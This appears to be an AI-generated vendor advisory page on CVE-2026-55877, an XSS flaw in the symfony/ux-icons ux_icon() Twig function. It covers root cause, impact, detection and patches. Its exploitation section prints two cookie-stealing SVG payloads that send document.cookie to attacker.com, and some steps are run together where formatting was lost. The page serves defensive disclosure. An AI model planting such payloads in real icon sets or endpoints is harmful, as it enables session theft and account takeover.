
PEACH
Un cadre d’isolation des locataires
CVE-2026-55877 is a Cross-Site Scripting (XSS) vulnerability in the symfony/ux-icons Composer package, affecting the ux_icon() Twig function which inlines SVG content verbatim into rendered HTML pages without adequate sanitization. The vulnerability affects versions >=2.17.0, <2.36.1 in the 2.x series and >=3.0.0, <3.2.0 in the 3.x series. It was disclosed on June 19, 2026, with patched versions 2.36.1 and 3.2.0 released simultaneously. The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium/Moderate) (GitHub Advisory, Symfony Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Because ux_icon() is declared is_safe=['html'], Twig bypasses its normal output escaping, and Icon::toHtml() inlines raw SVG markup directly into the page. Two distinct code paths are vulnerable: (1) the local file path via Icon::fromFile(), which only stripped <script> elements that were direct children of <svg>, leaving nested scripts and all on* event-handler attributes intact; and (2) the Iconify on-demand path (enabled by default), where the remote JSON body field was wrapped into an Icon object with zero sanitization. Attack vectors include a malicious SVG icon pack from a third-party theme or downloaded icon set, or a controlled/poisoned Iconify endpoint configured via iconify.endpoint (GitHub Advisory, symfony/ux Advisory).
Successful exploitation allows an unauthenticated attacker who can supply malicious icon packs or control the Iconify endpoint to inject and execute arbitrary JavaScript in the browsers of users visiting the affected application. This can result in session cookie theft, account takeover, unauthorized actions performed on behalf of victims, and redirection to malicious sites. Confidentiality and integrity are both partially impacted (low), while availability is unaffected, and the scope change indicates the impact crosses the security boundary of the vulnerable component into the user's browser context (GitHub Advisory, Feedly).
symfony/ux-icons in an affected version (2.17.0–2.36.0 or 3.0.0–3.1.x) that renders icons via the ux_icon() Twig function.iconify.endpoint.<script> element (bypassing the shallow child-only strip) or an on* event-handler attribute, e.g., <svg><g><script>document.location='https://attacker.com/?c='+document.cookie</script></g></svg> or <svg onload="fetch('https://attacker.com/?c='+document.cookie)">.{{ ux_icon('malicious-icon') }}.<script>, on* attributes, javascript: URIs, or <foreignObject>/<iframe>/<object>/<embed> elements.body content in Iconify API responses; cache files containing SVG payloads with script-capable constructs.Update symfony/ux-icons to version 2.36.1 (for the 2.x series) or 3.2.0 (for the 3.x series), which introduce a centralized IconFactory sanitizer that removes <script>, <foreignObject>, <iframe>, <object>, <embed>, SMIL animations, CDATA sections, processing instructions, all on* attributes, and javascript:, vbscript:, and data:text/html URL schemes before any Icon object is created. Until patching is possible, restrict or disable the use of untrusted third-party icon packs and avoid configuring untrusted iconify.endpoint values. Implementing a strict Content Security Policy (CSP) that disallows inline scripts can significantly reduce the impact of any residual XSS risk (GitHub Advisory, Symfony Advisory).
The vulnerability was reported by Pascal Cescon and fixed by Hugo Alliaume (Kocal), with the advisory published by Symfony maintainer fabpot on June 19, 2026 (symfony/ux Advisory). A Reddit thread in r/symfony discussed the CVE shortly after disclosure, indicating community awareness (Reddit). No major media coverage or notable external researcher commentary beyond the official advisory has been observed at this time.
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."